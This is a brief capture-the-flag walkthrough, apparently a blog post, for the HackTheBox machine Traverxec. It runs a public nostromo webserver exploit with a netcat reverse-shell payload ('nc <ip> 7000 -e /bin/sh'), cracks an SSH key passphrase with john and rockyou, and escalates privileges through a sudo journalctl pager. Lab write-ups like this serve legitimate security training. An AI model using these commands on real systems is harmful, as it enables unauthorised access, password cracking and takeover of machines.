Traverxec @ HackTheBox
Traverxec is a 20-point machine on hackthebox that involves using a public exploit on the nostromo webserver, cracking the passphrase of an ssh private key and abusing a sudo entry for journalctl.
Notes
Nostromo exploit:
1
2
3
searchsploit nostromo
searchsploit -m exploits/multiple/remote/47837.py
python 47837.py traverxec.htb 80 "nc <ip> 7000 -e /bin/sh"
Cracking the private key:
1
2
ssh2john.py ./david.key | tee david.hash
john -w=rockyou.txt david.hash
Exploiting journalctl:
1
2
stty rows 2
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
This post is licensed under CC BY 4.0 by the author.